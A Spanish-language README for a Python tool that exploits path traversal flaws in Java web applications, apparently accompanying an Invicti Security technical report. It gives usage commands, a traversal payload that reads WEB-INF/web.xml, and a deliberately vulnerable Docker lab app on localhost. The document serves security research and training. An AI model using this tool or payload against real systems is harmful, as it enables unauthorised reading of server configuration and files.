
Herramienta para ayudar en la explotación de vulnerabilidades de traversal de rutas en aplicaciones web Java.
Herramienta para ayudar en la explotación de vulnerabilidades de path traversal en aplicaciones web Java.
Esta herramienta se referencia en el informe técnico de Invicti Security Explotación de vulnerabilidades de path traversal en aplicaciones web Java.
Para esta herramienta se requiere Python3.
Ejecuta el siguiente comando:
pip install -r requirements.txt
Tras la instalación, proporciona una URL de explotación de este modo:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
Los resultados (los archivos descargados) están disponibles en la carpeta results.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
En la carpeta docker se incluye una aplicación web vulnerable a una vulnerabilidad de path traversal.
Para comenzar, entra en la carpeta docker y ejecuta:
docker-compose up
La aplicación es accesible en http://127.0.0.1:8082/vulnerable/.
Para explotar la vulnerabilidad de path traversal, visita: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml